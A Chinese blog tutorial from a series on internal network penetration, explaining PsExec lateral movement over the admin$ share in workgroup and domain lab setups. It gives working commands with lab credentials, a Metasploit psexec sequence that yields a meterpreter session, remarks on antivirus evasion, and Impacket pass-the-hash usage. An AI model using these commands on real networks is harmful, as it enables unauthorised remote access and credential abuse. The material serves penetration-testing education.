内网渗透(十五) | psexec工具使用浅析(admin$)

  • A+
所属分类:安全工具

内网渗透(十五) | psexec工具使用浅析(admin$)

作者:谢公子


CSDN安全博客专家,擅长渗透测试、Web安全攻防、红蓝对抗。其自有公众号:谢公子学安全

免责声明:本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表 安世加 的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作!


欢迎各位添加微信号:qinchang_198231  

加入 安世加 交流群 和大佬们一起交流安全技术

Psexec

psexec 是 windows 下非常好的一款远程命令行工具。psexec的使用不需要对方主机开机3389端口,只需要对方开启admin$共享(该共享默认开启)。但是,假如目标主机开启了防火墙,psexec也是不能使用的,会提示找不到网络路径。由于psexec是windows提供的工具,所以杀毒软件会将其添加到白名单中。

psexec的基本原理是:通过管道在远程目标机器上创建一个psexec服务,并在本地磁盘中生成一个名为"PSEXESVC"的二进制文件。然后,通过psexec服务运行命令,运行结束后删除服务。

在使用psexec执行远程命令时,会在目标系统中创建一个psexec服务。命令执行后,psexec服务将会被自动删除。由于创建或删除服务时会产生大量的日志,所以会在攻击溯源时通过日志反推攻击流程。

内网渗透(十五) | psexec工具使用浅析(admin$)

psexec使用前提:

  • 对方主机开启了 admin$ 共享,如果关闭了admin$共享,会提示:找不到网络名

  • 如果是工作组环境,则必须使用administrator用户连接,使用普通用户连接会提示:登录失败: 未授予用户在此计算机上的请求登录类型。

  • 如果是域环境,连接普通域主机可以用普通域用户,连接域控需要域管理员。

内网渗透(十五) | psexec工具使用浅析(admin$)
内网渗透(十五) | psexec工具使用浅析(admin$)

参数:

  • -u:指定用户名

  • -p:指定密码

  • -accepteula:第一次运行psexec会弹出确认框,使用该参数就不会弹出确认框

  • -s:以system权限运行运程进程,获得一个system权限的交互式shell。如果不使用该参数,会获得一个administrator权限的shell


内网渗透(十五) | psexec工具使用浅析(admin$)


工作组环境

如果是在非域环境下即工作组环境,psexec只能使用 administrator 账号登录,使用其他账号(包括管理员组中的非administrator用户)登录都会提示访问拒绝访问。

目标机器:192.168.10.131

  • 管理员:administrator  密码:root

  • 管理员:test 密码:root

  • 非管理员:hack  密码:root

psexec.exe \192.168.10.131 -u administrator -p root cmd

由图可知,只有 administrator 用户可使用psexec登陆。即使 test 用户也在管理员组内,也不能登录。 

内网渗透(十五) | psexec工具使用浅析(admin$)


内网渗透(十五) | psexec工具使用浅析(admin$)


域环境

登录域控

域控只能使用域管理员组内账号密码登录,不能使用域普通成员账号登录,也不能本地登录。

域控:192.168.10.131

  • 域管理员:xietest 密码:x123456./

psexec.exe \192.168.10.131 -u xietest -p x123456./ cmd
内网渗透(十五) | psexec工具使用浅析(admin$)


以域用户登录域成员主机

域成员主机:192.168.10.130

  • 域普通用户:xiehack  密码:x123456./

域成员主机可以使用普通域用户登录

psexec.exe \192.168.10.130 -u xiehack -p x123456./ cmd
内网渗透(十五) | psexec工具使用浅析(admin$)


以本地用户登录域成员主机

域成员主机:192.168.10.22 (pc-win2008)

  • 本地管理员:administrator  密码:root

使用本地用户登录域成员主机,也只能使用本地的 administrator 用户登录,前提是该主机没禁用administrator用户。

内网渗透(十五) | psexec工具使用浅析(admin$)


内网渗透(十五) | psexec工具使用浅析(admin$)


MSF中的psexec模块

MSF中的psexec,主要讲以下两个:

  • exploit/windows/smb/psexec:该模块生成的payload是exe程序

  • exploit/windows/smb/psexec_psh  :该模块生成的payload主要是由powershell实现的

显然powershell生成的payload免杀效果比exe的要好,但是windows xp、server2003默认不包含powershell环境。所以,这两个模块各有各自的优势。

内网渗透(十五) | psexec工具使用浅析(admin$)
use exploit/windows/smb/psexecset rhost 192.168.10.131set smbuser administratorset smbpass x123456./@exploit

攻击成功后,会返回一个meterpreter类型的session 

内网渗透(十五) | psexec工具使用浅析(admin$)


内网渗透(十五) | psexec工具使用浅析(admin$)


Impacket中的psexec.py

关于如何安装Impacket框架

git clone https://github.com/CoreSecurity/impacket.gitcd impacket/python setup.py installcd examples./psexec.py xxx

这里由于我是在自己的VPS上安装的Impacket框架,而靶机处在内网,所以我用代理实现互通。

#用明文密码连接./psexec.py xie/administrator:密码@192.168.10.131#用哈希值连接./psexec.py xie/[email protected] -hashes AADA8EDA23213C025AE50F5CD5697D9F:6542D35ED5FF6AE5E75B875068C5D3BC
内网渗透(十五) | psexec工具使用浅析(admin$)
内网渗透(十五) | psexec工具使用浅析(admin$)

内网渗透(十五) | psexec工具使用浅析(admin$)

内网渗透(十五) | psexec工具使用浅析(admin$)

内网渗透(十四) | 工具的使用|Impacket的使用

内网渗透(十三) | WinRM远程管理工具的使用

内网渗透(十二) | 利用委派打造隐蔽后门(权限维持)

内网渗透(十一) | 哈希传递攻击(Pass-the-Hash,PtH)

技术干货 | 工具:Social engineering tookit 钓鱼网站

技术干货 | 工具的使用:CobaltStrike上线Linux主机(CrossC2)

内网渗透(十) | 票据传递攻击

内网渗透(九) | Windows域的管理

内网渗透(八) | 内网转发工具的使用

内网渗透 | 域内用户枚举和密码喷洒攻击(Password Spraying)

内网渗透(七) | 内网转发及隐蔽隧道:网络层隧道技术之ICMP隧道(pingTunnel/IcmpTunnel)

内网渗透(六) | 工作组和域的区别

内网渗透(五) | AS-REP Roasting攻击

内网渗透 | 内网穿透工具FRP的使用
内网渗透(四) | 域渗透之Kerberoast攻击_Python
内网渗透(三) | 域渗透之SPN服务主体名称
内网渗透(二) | MSF和CobaltStrike联动
内网渗透 | 域内认证之Kerberos协议详解
内网渗透(一) | 搭建域环境

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: